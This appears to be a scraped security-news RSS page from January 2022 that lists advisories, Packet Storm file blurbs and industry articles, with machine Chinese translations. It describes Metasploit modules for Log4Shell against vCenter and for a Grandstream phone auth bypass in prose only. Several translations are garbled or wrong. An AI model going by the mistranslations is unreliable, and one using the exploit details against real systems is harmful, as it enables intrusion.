当前节点:rss
时间节点
2022年1月21日 05:34CXSECURITY Database RSS Feed -
Topic: North Wing Limited - Sql Injection Vulnerability Risk: Medium Text:********************************************************* #Exploit Title: North Wing Limited - Sql Injection Vulnerability #...
2022年1月21日 05:09malware.news
Google has issued an update for the Chrome browser which includes 26 security fixes. What stands out is that one of these fixes is rated as “critical”. The critical vulnerability is a use after free bug in the Safe Browsing feature.
The Stable channel has been updated to 97.0.4692.99 for Windows, Mac and Linux which will roll out over the coming days/weeks. Extended stable channel has also been updated to 96.0.4664.110 for Windows and Mac which will roll out over the coming days/weeks
The vulnerability
Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in Safe Browsing that was rated critical has been assigned CVE-2022-0289. While Chrome vulnerabilities are rarely rated critical, this is already the second one this year. The previous one (CVE-2022-0096) was another use after free vulnerability that could lead t
2022年1月21日 04:39malware.news
Unless you’ve been living under a rock for the last month, you’ve definitely heard the technology community discussing the log4j vulnerability known as log4shell. If you have been living under a rock, feel free to catch up here. The danger of the vulnerability has been well covered, from the pervasiveness of the library in organizations worldwide to its ease of exploitation. It’s the type of bug whose full ramifications we may not understand for years.
There have been no shortage of hot takes on the issue, most of which surround the question ‘who is at fault?’. Is it the volunteer 16 person logging services team at Apache Software Foundation? Is it the companies that make millions of dollars using open source code in their software but don’t make financial contributions to the maintenance of those open source components? What about the current lack of federal regulation surrounding the software supply chain?
The answer is probably some level of shared responsibility. Large corporations profiting off software 
2022年1月21日 04:09malware.news
The network guidance document is years in the making.
Article Link: https://www.nextgov.com/cybersecurity/2022/01/cisa-releases-finalized-ipv6-guidance-agencies/360973/
1 post - 1 participant
Read full topic
网络指导文件的制定历时数年。
文章链接:  https://www.nextgov.com/cybersecurity/2022/01/cisa-releases-finalized-ipv6-guidance-agencies/360973/
1名1岁以后的参与者
阅读完整主题
2022年1月21日 04:09malware.news
Most parents may find it difficult to relate to today’s form of cyberbullying. That’s because, for many of us, bullying might have come in a series of isolated, fleeting moments such as an overheard rumor, a nasty note passed in class, or a few brief hallway confrontations.
Fast forward a few dozen decades, and the picture is spectacularly different and a world few adults today would eagerly step into.
Cyberbullying includes targeting that is non-stop. It’s delivered digitally in an environment that is often anonymous. It’s a far-reaching, esteem-shattering, emotional assault. And the most traumatic component? The perpetual nature of the internet adds the ever-present threat of unlimited accessibility—kids know bullying can happen to anyone, at any time, and spread like wildfire.
The nature of cyberbullying can make a young victim feel hopeless and powerless. Skipping school doesn’t stop it. Summer vacation doesn’t diminish it. That’s because the internet is ever-present.
According to a 2020 Ditch the Label C
2022年1月21日 03:39malware.news
Newsletter compiled by Jon Munshaw.Good afternoon, Talos readers.
Even though we’re nearly a month into 2022, we’re still not quite ready to move on from 2021. That’s why next week, we’ll be going live on social media to talk about some of the top cybersecurity stories from the past…



[[ This is only the beginning! Please visit the blog for the complete entry ]]
Article Link: Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Source Newsletter (Jan. 20, 2022)
1 post - 1 participant
Read full topic
通讯编辑乔恩芒肖。下午好,塔罗斯读者。
即使我们已经进入2022年将近一个月了,我们仍然没有完全准备好从2021年开始。这就是为什么下周,我们将在社交媒体上现场讨论过去的一些顶级网络安全故事..。



[这仅仅是个开始! 请访问我的博客查看完整的条目]
文章链接: 思科塔罗斯情报组-综合威胁情报: 威胁来源通讯(2022年1月20日)
1名1岁以后的参与者
阅读完整主题
2022年1月21日 03:39malware.news
A new report reveals what kind of medical devices are at most risk of security threats.
Article Link: More than half of medical devices found to have critical vulnerabilities | ZDNet
1 post - 1 participant
Read full topic
一份新的报告揭示了什么样的医疗设备最容易受到安全威胁。
文章链接: 超过一半的医疗设备存在严重缺陷 | ZDNet
1名1岁以后的参与者
阅读完整主题
2022年1月21日 03:35Black Hills Information Securi
ORIGINALLY AIRED ON JANUARY 4, 2022 Articles discussed in this episode: 00:00 – PreShow Banter™ — Who’s Job Is It Anyway? 00:20 – BHIS – Talkin’ Bout [infosec] News 2022-01-04 01:58 – Story # 1: iLOBleed Rootkit – https://thehackernews.com/2021/12/new-ilobleed-rootkit-targeting-hp.html 08:39 – Story # 2: Firmware attack can drop persistent malware in hidden SSD area – https://www.bleepingcomputer.com/news/security/firmware-attack-can-drop-persistent-malware-in-hidden-ssd-area/ […]
The post Talkin’ About Infosec News – 1/7/2022 appeared first on Black Hills Information Security.
本期节目讨论的文章: 00:00-PreShow BanterTM-Who’s Job Is It Anyway?00:20-BHIS-Talkin’Bout [ infosec ] News 2022-01-0401:58-Story # 1: iLOBleed Rootkit- https://thehackernews.com/2021/12/new-iLOBleed-Rootkit-targeting-hp.html 08:39-Story # 2: 固件攻击可以将持久的恶意软件丢弃在隐藏的 SSD 区域- https://www.bleepingcomputer.com/News/security/Firmware-attack-can-drop-persistent-malware-in-hidden-SSD-area/
2022年7月1日,《谈论信息安全》这篇文章首次出现在《黑山信息安全》上。
2022年1月21日 03:35Black Hills Information Securi
ORIGINALLY AIRED ON JANUARY 10, 2022 Articles discussed in this episode: 01:58 – Story # 1: WordPress Core Vulnerabilities – https://www.searchenginejournal.com/wordpress-core-vulnerabilities/432042/#close 11:32 – Story # 2: Card-stealing code on over 100 Sotheby’s luxury real estate sites – https://therecord.media/card-stealing-code-found-on-more-than-100-sothebys-luxury-real-estate-sites/ 14:55 – Story # 3: France hits Facebook & Google with $210 million in fines – https://www.bleepingcomputer.com/news/legal/france-hits-facebook-and-google-with-210-million-in-fines/ […]
The post Talkin’ About Infosec News – 1/14/2022 appeared first on Black Hills Information Security.
本集讨论的文章: 01:58-故事 # 1: WordPress 核心漏洞- https://www.searchenginejournal.com/WordPress-Core-Vulnerabilities/432042/#close 11:32-故事 # 2:100多家苏富比豪华房地产网站的盗卡代码 -Https://therecord.media/card-stealing-code-found-on-more-than-100-sothebys-luxury-real-estate-sites/14:55-故事3: 法国对 Facebook 和谷歌处以2.1亿美元的罚款—— https://www.bleepingcomputer.com/news/legal/Franc
2022年1月21日 03:35Files ≈ Packet Storm
Ransomware Builder Babuk malware suffers from an insecure permissions vulnerability.
勒索软件 Builder Babuk 恶意软件存在不安全的权限漏洞。
2022年1月21日 03:35Files ≈ Packet Storm
Red Hat Security Advisory 2022-0187-04 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include heap overflow and privilege escalation vulnerabilities.
Red Hat Security Advisory 2022-0187-04-Kernel-rt 包提供了实时 Linux 内核,它支持对具有极高确定性要求的系统进行微调。解决的问题包括堆溢出和权限提升安全漏洞。
2022年1月21日 03:35Files ≈ Packet Storm
Red Hat Security Advisory 2022-0186-07 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include heap overflow and privilege escalation vulnerabilities.
Red Hat Security Advisory 2022-0186-07-kernel package contain The Linux kernel kernel,The core of any Linux operating system.解决的问题包括堆溢出和权限提升安全漏洞。
2022年1月21日 03:35Files ≈ Packet Storm
Red Hat Security Advisory 2022-0114-04 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.7.41.
Red Hat Security Advisory 2022-0114-04-Red Hat OpenShift Container Platform 是 Red Hat 的云计算 Kubernetes 应用平台解决方案,设计用于本地或私有云部署。此通知包含 Red Hat OpenShift Container Platform 4.7.41的 RPM 包。
2022年1月21日 03:35Files ≈ Packet Storm
Red Hat Security Advisory 2022-0188-07 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a heap overflow vulnerability.
Red Hat Security Advisory 2022-0188-07-kernel package contain The Linux kernel kernel,The core of any Linux operating system.解决的问题包括堆溢出漏洞。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0190-04 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments. Issues addressed include an information leakage vulnerability.
红帽安全咨询2022-0190-04-红帽卫星是一个系统管理解决方案,允许各组织配置和维护其系统,而无需向其服务器或其他客户端系统提供公共互联网接入。它执行预定义的标准操作环境的供应和组态管理。所涉及的问题包括信息泄露安全漏洞。
2022年1月21日 03:34Files ≈ Packet Storm
Ubuntu Security Notice 5240-1 - William Liu and Jamie Hill-Daniel discovered that the file system context functionality in the Linux kernel contained an integer underflow vulnerability, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or execute arbitrary code.
Ubuntu Security Notice 5240-1-William Liu 和 Jamie Hill-Daniel 发现 Linux 内核中的文件系统上下文功能包含一个整数下溢漏洞,导致写入超出界限。本地攻击者可以利用这个导致分布式拒绝服务攻击攻击或执行任意代码。
2022年1月21日 03:34Files ≈ Packet Storm
Ubuntu Security Notice 5241-1 - It was discovered that QtSvg incorrectly handled certain malformed SVG images. If a user or automated system were tricked into opening a specially crafted image file, a remote attacker could use this issue to cause QtSvg to crash, resulting in a denial of service, or possibly execute arbitrary code.
Ubuntu 安全通知5241-1-发现 QtSvg 不正确地处理了某些格式不正确的 SVG 图像。如果一个用户或者自动化系统被欺骗打开了一个特制的图像文件,远程攻击者可以利用这个问题导致 QtSvg 崩溃,导致一个分布式拒绝服务攻击文件,或者可能执行任意代码。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0199-02 - Libreswan is an implementation of IPsec and IKE for Linux. IPsec is the Internet Protocol Security and uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks such as virtual private network.
Red Hat Security Advisory 2022-0199-02-Libreswan 是用于 Linux 的 IPsec 和 IKE 的实现。IPsec 是 Internet 协议安全(internetprotocolsecurity) ,使用强加密技术提供身份验证和加密服务。这些服务允许您通过不可信的网络(如虚拟专用网络)构建安全隧道。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0191-03 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains OpenShift Virtualization 4.9.2 images.
2022-0191-03-OpenShift 虚拟化是 Red Hat 为 Red Hat OpenShift 容器平台设计的虚拟化解决方案。本报告包含 OpenShift 虚拟化4.9.2映像。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0202-04 - The Migration Toolkit for Containers enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Red Hat Security Advisory 2022-0202-04-The Migration Toolkit for Container 允许您使用 MTC web 控制台或 Kubernetes API 在 OpenShift Container Platform 集群之间迁移 Kubernetes 资源、持久性卷数据和内部容器图像。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0203-03 - The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References. Issues addressed include code execution and denial of service vulnerabilities.
Red Hat Security Advisory 2022-0203-03-The releases of Red Hat Fuse 7.8.2、7.9.1和7.10.1用作 Karaf 上的 Red Hat Fuse 和 Spring Boot 上的 Red Hat Fuse 的补丁,包括安全修复,这些在参考文献链接的发行说明文档中有记录。解决的问题包括代码执行和分布式拒绝服务攻击安全漏洞。
2022年1月21日 03:34Files ≈ Packet Storm
Ubuntu Security Notice 5021-2 - USN-5021-1 fixed vulnerabilities in curl. This update provides the corresponding updates for Ubuntu 16.04 ESM. Harry Sintonen and Tomas Hoger discovered that curl incorrectly handled TELNET connections when the -t option was used on the command line. Uninitialized data possibly containing sensitive information could be sent to the remote server, contrary to expectations.
Ubuntu 安全公告5021-2-usn-5021-1固定的 curl 漏洞。此更新提供了 Ubuntu 16.04 ESM 的相应更新。Harry Sintonen 和 Tomas Hoger 发现,当在命令行上使用 -t 选项时,curl 不正确地处理 TELNET 连接。可能包含敏感信息的未初始化数据可能被发送到远程服务器,这与预期相反。
2022年1月21日 03:34Files ≈ Packet Storm
Ubuntu Security Notice 5242-1 - It was discovered that Open vSwitch incorrectly handled certain fragmented packets. A remote attacker could possibly use this issue to cause Open vSwitch to consume resources, leading to a denial of service.
Ubuntu 安全通告5242-1——发现 Open vSwitch 不正确地处理某些片段化的数据包。远程攻击者可能会利用这个问题导致 Open vSwitch 消耗资源,从而导致分布式拒绝服务攻击攻击。
2022年1月21日 03:34Security Boulevard
When it comes to navigating the challenges presented by today’s cybersecurity landscape, most businesses need additional support. That’s where a managed security services provider (MSSP) can prove invaluable. MSSPs have their pulse on current and future cybersecurity needs, and can help clients navigate an ever-changing set of threats. But with hundreds of MSSPs out there,…
The post What to Look for in an MSSP – Our Top 10 Tips, Plus Free Downloadable Checklist appeared first on Nuspire.
The post What to Look for in an MSSP – Our Top 10 Tips, Plus Free Downloadable Checklist appeared first on Security Boulevard.
当涉及到如何应对当今网络安全环境所带来的挑战时,大多数企业都需要额外的支持。这就是托管安全服务提供程序(MSSP)的价值所在。Mssp 对当前和未来的网络安全需求了如指掌,可以帮助客户应对一系列不断变化的威胁。但是有成百上千的 mssp 在那里,..。
这篇文章《在 MSSP 中寻找什么-我们的10大技巧,加上免费下载清单》最先出现在 Nuspire 上。
这篇文章《在 MSSP 中寻找什么-我们的10大技巧,加上免费下载清单》最先出现在安全大道上。
2022年1月21日 03:34Files ≈ Packet Storm
Ubuntu Security Notice 5243-1 - David Bouman discovered that AIDE incorrectly handled base64 operations. A local attacker could use this issue to cause AIDE to crash, resulting in a denial of service, or possibly execute arbitrary code.
Ubuntu 安全通知5243-1-David Bouman 发现 AIDE 不正确地处理 base64操作。本地攻击者可以利用这个问题导致 AIDE 崩溃,从而产生分布式拒绝服务攻击攻击,或者可能执行任意代码。
2022年1月21日 03:34Security Boulevard
Our thanks to Security BSides London for publishing their tremendous videos from the Security BSides London 2021 Conference on the organization’s YouTube channel. Enjoy!
Permalink
The post Security BSides London 2021 – Gabriel Currie’s ‘Ready For (Nearly) Anything: Preparing Your Organisation For A Cyber Incident’ appeared first on Security Boulevard.
我们感谢伦敦安全协会在该组织的 YouTube 频道上发布了他们在伦敦安全协会2021年会议上的大量视频。享受吧!
Permalink
2021年伦敦邮政安全双方-加布里埃尔柯里的“准备(几乎)一切: 准备你的组织为网络事件”首次出现在安全大道。
2022年1月21日 03:34Security Boulevard
When defense contractors look for a reliable source to store and share their controlled unclassified information (CUI), they will frequently turn to a cloud service provider (CSP). Cloud is a superior choice for contractors over storing on premise as cloud enables unlimited storage, access to data from anywhere, data resiliency, and freedom from managing and […]
The post <span style="color:#f05f2a;">Buyers Guide</span> to Compliant Cloud Services for Defense Contractors appeared first on PreVeil.
The post Buyers Guide to Compliant Cloud Services for Defense Contractors appeared first on Security Boulevard.
当国防承包商寻找可靠的来源来存储和共享他们受控的非机密信息(CUI)时,他们经常会求助于云服务提供商(CSP)。对于承包商而言,云是一个优越的存储选择,因为云可以无限制地存储,从任何地方访问数据,数据弹性,以及免于管理和[ ... ]
国防承包商云服务的购买者指南第一次出现在 PreVeil 上。
国防承包商云服务标准购买指南首次出现在安全大道上。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0216-06 - Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. This asynchronous patch is a security update for Red Hat JBoss Enterprise Application Platform 7.4. Issues addressed include code execution and denial of service vulnerabilities.
Red Hat Security Advisory 2022-0216-06-Red Hat JBoss企业应用平台7是一个基于 WildFly 应用程序运行时的 Java 应用程序平台。这个异步补丁是 Red Hat JBoss企业应用平台7.4的一个安全更新。解决的问题包括代码执行和分布式拒绝服务攻击安全漏洞。
2022年1月21日 03:34Security Boulevard
It’s no secret that APIs are under attack. Companies are struggling to keep their APIs safe and secure from accidental breaches to malicious hacks. The problem will only worsen as.
The post Critical OWASP Top 10 API Security Threats appeared first on Indusface.
The post Critical OWASP Top 10 API Security Threats appeared first on Security Boulevard.
Api 受到攻击已不是什么秘密。公司正在努力保证他们的 api 安全,以免意外的破坏和恶意攻击。这个问题只会越来越严重。
10 API Security Threats first appeared on Indusface.
十大 API 安全威胁最早出现在安全大道。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0083-03 - This release of Red Hat build of Eclipse Vert.x 4.1.8 GA includes security updates. For more information, see the release notes listed in the References section. Issues addressed include code execution and denial of service vulnerabilities.
红帽安全咨询2022-0083-03-这个版本的红帽构建的 Eclipse Vert.x 4.1.8 GA 包括安全更新。有关更多信息,请参阅参考资料部分中列出的发行说明。解决的问题包括代码执行和分布式拒绝服务攻击安全漏洞。
2022年1月21日 03:34Security Boulevard
The Federal Communications Commission (FCC) has proposed stricter requirements for companies to disclose data breaches. According to the proposal, companies would be required to notify customers affected by inadvertent breaches, and the one-week waiting period before disclosure would be eliminated. The updates would better align the FCCs rules with recent developments in federal and state..
The post FCC Proposes Stricter Regulations for Data Breach Disclosure  appeared first on Security Boulevard.
美国联邦通信委员会(FCC)已经提议对公司披露数据泄露行为提出更严格的要求。根据该提案,公司将被要求通知因意外违规而受到影响的客户,并取消披露前的一周等待期。这些更新将使联邦通信委员会的规则更好地与联邦和州最近的发展保持一致。.
后 FCC 提出更严格的数据泄露规定首先出现在安全大道上。
2022年1月21日 03:34Files ≈ Packet Storm
William Liu and Jamie Hill-Daniel discovered that the file system context functionality in the Linux kernel contained an integer underflow vulnerability, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code.
William Liu 和 Jamie Hill-Daniel 发现 Linux 内核中的文件系统上下文功能包含一个整数下溢漏洞,导致写入超出界限。本地攻击者可以利用这一点导致系统崩溃或执行任意代码分布式拒绝服务攻击。
2022年1月21日 03:34Files ≈ Packet Storm
AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determining which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.
AIDE (高级入侵检测环境)是 Tripwire (tm)的免费替代品。它生成一个数据库,可用于检查服务器上的文件的完整性。它使用正则表达式来确定哪些文件被添加到数据库中。您可以使用多种消息摘要算法来确保文件没有被篡改。
2022年1月21日 03:34Files ≈ Packet Storm
Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.
Botan 是一个 c + + 加密算法库,包括 AES、 DES、 SHA-1、 RSA、 DSA、 Diffie-Hellman 等等。它还支持 x. 509证书和 crl,以及 PKCS # 10证书请求,并具有高级的过滤器/管道消息处理系统。该库可以很容易地移植到大多数系统和编译器,并包含大量的教程和 API 参考。这是当前的稳定版本。
2022年1月21日 03:34Files ≈ Packet Storm
Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility, grep. It's comparable to other static analysis applications like RATS, SWAAT, and flaw-finder while keeping the technical requirements to a minimum and being very flexible.
Graudit 是一个简单的脚本和签名集,它允许您使用 GNU 实用程序 grep 在源代码中查找潜在的安全缺陷。它可以与其他静态分析应用程序相媲美,比如 RATS、 SWAAT 和缺陷查找程序,同时保持最低的技术要求,并且非常灵活。
2022年1月21日 03:34Files ≈ Packet Storm
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows. This Metasploit module will start an LDAP server that the target will need to connect to. This exploit uses the logon page vector.
VMware vCenter Server 受到 Log4Shell 漏洞的影响,因此可以将 JNDI 字符串发送到服务器,从而导致它连接到攻击者并反序列化恶意 Java 对象。这将导致操作系统命令在根用户的上下文中执行,在 Linux 虚拟设备和 Windows 系统的情况下。Metasploit 模块将启动目标需要连接到的 LDAP 服务器。这个漏洞使用登录页面向量。
2022年1月21日 03:34Files ≈ Packet Storm
This Metasploit module exploits a command injection vulnerability in Grandstream GXV3175 IP multimedia phones. The settimezone action does not validate input in the timezone parameter allowing injection of arbitrary commands. A buffer overflow in the phonecookie cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19.
这个 Metasploit 模块利用了 Grandstream GXV3175 IP 多媒体电话中的命令注入漏洞。Settimezone 操作不验证 timezone 参数中的输入,允许任意命令的注入。Phonecokie cookie 解析中的缓冲区溢出允许通过提供长度为93个字母的字母数字 cookie 来绕过身份验证。该模块在 Grandstream gxv3175v2硬件版本 V2.6 a 和固件版本1.0.1.19上进行了成功的测试。
2022年1月21日 03:34Files ≈ Packet Storm
The openscap project is a set of open source libraries that support the SCAP (Security Content Automation Protocol) set of standards from NIST. It supports CPE, CCE, CVE, CVSS, OVAL, and XCCDF.
Openscap 项目是一组开源库,支持 NIST 提供的 SCAP (安全内容自动化协议标准)集。它支持 CPE、 CCE、 CVE、 CVSS、 OVAL 和 XCCDF。
2022年1月21日 03:34Files ≈ Packet Storm
Red Hat Security Advisory 2022-0205-02 - Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale. Data Grid 8.2.3 replaces Data Grid 8.2.2 and includes bug fixes and enhancements. Issues addressed include code execution and denial of service vulnerabilities.
Red Hat Security Advisory 2022-0205-02-Red Hat Data Grid 是一个内存中的、分布式的 NoSQL 数据存储解决方案。它增加了应用程序的响应时间,并允许在提供可用性、可靠性和弹性范围的同时显著提高性能。数据网格8.2.3取代了数据网格8.2.2,包括 bug 修复和增强。解决的问题包括代码执行和分布式拒绝服务攻击安全漏洞。
2022年1月21日 03:09malware.news
I use PowerPoint in my law practice more often than Microsoft Word.  Word processing tools are for preparing documents for …
Continue reading →
Article Link: Six Powerful Points for Better Presentations | Ball in your Court
1 post - 1 participant
Read full topic
我在法律实践中使用 PowerPoint 的次数比使用微软 Word 的次数还多。文字处理工具是用来准备文件的。
继续读→
6 Powerful Points for Better Presentations | Ball in your Court
1名1岁以后的参与者
阅读完整主题
2022年1月21日 03:09malware.news
Online activity is starting to trickle out of the island nation of Tonga after a massive volcanic eruption and tsunami Saturday left the area offline while responding to the disaster, according to global networks watchers.
UPDATE ON TONGA: First signs of life for Internet connectivity out of #Tonga since the volcanic eruption!

TCC (Tonga Communications Company, AS38201) started coming back via satellite (Speedcast, AS5666) earlier today.https://t.co/8RljNqIqwC pic.twitter.com/vmNYMtHAZ9
— Doug Madory (@DougMadory) January 20, 2022
Doug Madory, Director of Internet Analysis for Kentik, says the company observed “first signs of life for Internet connectivity in Tonga since the recent volcanic eruption” at  22:37 UTC on 19 January 2022.
“Incumbent provider TCC (Tonga Communications Company) has reappeared in the global routing table via a connection to Speedcast, a Pacific region satellite operator,” Madory told The Record.

Speedcast confirmed to The Record that it was helping “restore vital connectivity servi
2022年1月21日 02:09malware.news
Now that we’re almost through the first month of 2022, it’s a good opportunity for us to take a look back at 2021 and the accomplishments of the Zero Day Initiative throughout the year. The past year was certainly a year full of its challenges, but we also celebrated some unique achievements in our busiest year ever. In addition to publishing the highest number of advisories in the history of the program, we hit our first million-dollar Pwn2Own in April. And as if that weren’t enough, we did it again in the fall as Pwn2Own Austin also exceeded the $1,000,000 threshold.
To say these were superlative events is an understatement. In the spring edition, we saw multiple Exchange exploits demonstrated, including ProxyShell. We saw 0-click remote code execution demonstrated on Zoom messenger and a 1-click code execution on Microsoft Teams. That’s on top of the Chrome, Edge, and Safari web browsers all getting compromised, too. The fall event had its own highlights, with the Samsung Galaxy, multiple routers, NAS devi
2022年1月21日 02:09malware.news
At some point a buzzword becomes meaningless; it moves so far beyond the original intention that it’s just background noise. We passed that moment a long time ago with the term “DevOps” and even quicker with “DevSecOps.” That’s unfortunate because both of these terms put a name to a long standing problem within teams building [...]
Read More... from What the Cloud? DevOps and DevSecOps Explained
The post What the Cloud? DevOps and DevSecOps Explained appeared first on Lacework.
Article Link: What the Cloud? DevOps and DevSecOps Explained - Lacework
1 post - 1 participant
Read full topic
在某种程度上,一个行话变得毫无意义; 它远远超出了最初的意图,它只是背景噪音。很久以前,我们用术语“ DevOps”来度过这一时刻,而用“ DevSecOps”来度过这一时刻更快这是不幸的,因为这两个术语都给团队建设中一个长期存在的问题起了个名字[ ... ... ]
阅读更多... ... 摘自 What the Cloud? DevOps and DevSecOps Explained
和 DevSecOps Explained 最先出现在 Lacework 上。
文章链接: 什么是云? DevOps 和 DevSecOps 解释-草稿
1名1岁以后的参与者
阅读完整主题
2022年1月21日 01:39malware.news
The Treasury Department on Thursday imposed sanctions on four current and former Ukrainian government officials for engaging in “Russian government-directed influence activities” in Ukraine, including gathering information about the country’s critical infrastructure.
The U.S. alleges that the four individuals — two Ukrainian members of parliament and two former officials — were recruited by Russia’s Federal Security Service (FSB) in an effort to place “citizens in key positions to gain access to sensitive information, threaten the sovereignty of Ukraine, and then leverage these Ukrainian officials to create instability in advance of a potential Russian invasion,” the Treasury Department said in a statement.
Moscow has directed its intelligence services to seek out such officials in order to “prepare to take over the government of Ukraine and to control Ukraine’s critical infrastructure with an occupying Russian force,” according to the department.
Among the individuals sanctioned is former Ukrainian governmen
2022年1月21日 01:39malware.news
The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post of our Voice of the Community blog series, Microsoft Security Product Marketing Manager Natalia Godyla talks with Heath Adams, Chief Executive Officer (CEO) at TCM Security about being a mentor, hiring new security talent, certifications, upskilling, the future of cybersecurity training, and lots more.
Natalia: What do you recommend to security leaders concerned with the talent shortfall?
Heath: There needs to be more openness and getting away from gatekeeping. In this industry, there’s a lot of, “I went through this path, so you need to go through this path.” Or “I did these certifications, so you need to do these certifications.” Everybody wants this perfect candidate—somebody who has 10 years of experience—even when they don’t necessarily need it. We need to be able to take somebody that’s more junior, who we can help train. Or take someone with a cle
2022年1月21日 01:34Security Boulevard
Last summer, the San Francisco police illegally used surveillance cameras at the George Floyd protests. The EFF is suing the police:
This surveillance invaded the privacy of protesters, targeted people of color, and chills and deters participation and organizing for future protests. The SFPD also violated San Francisco’s new Surveillance Technology Ordinance. It prohibits city agencies like the SFPD from acquiring, borrowing, or using surveillance technology, without prior approval from the city’s Board of Supervisors, following an open process that includes public participation. Here, the SFPD went through no such process before spying on protesters with this network of surveillance cameras...
The post San Francisco Police Illegally Spying on Protesters appeared first on Security Boulevard.
去年夏天,旧金山警方在乔治 · 弗洛伊德的抗议活动中非法使用监控摄像头。正在起诉警方:
这种监视侵犯了抗议者的隐私,针对有色人种,并且使参与和组织未来抗议的人感到寒心和恐惧。旧金山警方也违反了旧金山新的监视技术条例。它禁止像旧金山警察局这样的城市机构在没有事先得到监事会(美国中西部及东部各州)安全局批准的情况下获取、借用或使用监控技术,遵循一个包括公众参与的开放过程。在这里,旧金山警方没有经过这样的程序,而是用这个监控摄像机网络来监视抗议
2022年1月21日 01:34Security Boulevard
Google pushed out a new Chrome version 97.0.4692.99 with much fanfare about a number of serious security fixes it brings. A total of 22 vulnerabilities addressed with the latest Chrome refresh were reported by external researchers, including one critical-severity [CVE-2022-0289, a critical use-after-free flaw in Safe Browsing that can achieve arbitrary code execution], 16 high-severity, … Continue reading Mixed Messages of Google Chrome 97: Worse Privacy, Better Security →
The post Mixed Messages of Google Chrome 97: Worse Privacy, Better Security appeared first on Security Boulevard.
推出了新的 Chrome 版本97.0.4692.99,并大张旗鼓地宣传了一系列严肃的安全修复措施。外部研究人员共报告了22个最新 Chrome 浏览器的漏洞,包括一个严重程度严重的漏洞[ CVE-2022-0289,一个安全浏览器中的关键用途-免费缺陷,可以实现任意代码执行] ,16个高严重程度,... 继续阅读谷歌 Chrome 97的混合消息: 更糟糕的隐私,更好的安全性→
谷歌 Chrome 97的混合信息: 更糟糕的隐私,更好的安全首先出现在安全大道。
2022年1月21日 01:34Security Boulevard
Security and IT teams need to tackle this problem in a structured process that takes into account API application security best practices and procedures that constantly evaluate an organization's APIs.
The post Observability, AI And Context: Protecting APIs From Today’s (And Tomorrow’s) Attacks appeared first on Traceable App & API Security.
The post Observability, AI And Context: Protecting APIs From Today’s (And Tomorrow’s) Attacks appeared first on Security Boulevard.
安全性和 IT 团队需要在一个结构化的过程中解决这个问题,这个过程考虑了 API 应用程序安全性最佳实践和过程,这些最佳实践和过程不断地评估组织的 API。
后可观察性,人工智能和上下文: 保护 API 免受今天(和明天)的攻击首先出现在可追踪的应用程序和 API 安全。
后可观察性,人工智能和上下文: 保护 api 免受今天(和明天)的攻击首先出现在安全大道。
2022年1月21日 01:34Security Boulevard
It's time to start treating your IT department differently. It is a resource, an employee retention tool, a critical cog in your ability to sustain operability.
The post Rebuttal: It’s Time to Get Rid of the IT Department appeared first on JumpCloud.
The post Rebuttal: It’s Time to Get Rid of the IT Department appeared first on Security Boulevard.
是时候开始以不同的方式对待你的 IT 部门了。它是一种资源,一种留住员工的工具,是你维持可操作性能力的关键一环。
反驳: 是时候摆脱 IT 部门了,这篇文章首次出现在 JumpCloud 上。
反驳: 是时候摆脱 IT 部门了,最早出现在安全大道上。
2022年1月21日 01:34Microsoft Security Blog
Heath Adams, Chief Executive Officer at TCM Security, offers practical advice on how to build a security team.
The post Build a stronger cybersecurity team through diversity and training appeared first on Microsoft Security Blog.
TCM 安全公司的首席执行官希斯 · 亚当斯就如何建立一个安全团队提供了切实可行的建议。
通过多样化和培训建立一个更强大的网络安全团队的帖子首先出现在微软安全博客上。
2022年1月21日 01:10malware.news
CEO Kris Marszalek said all impacted users were fully reimbursed on the same day.
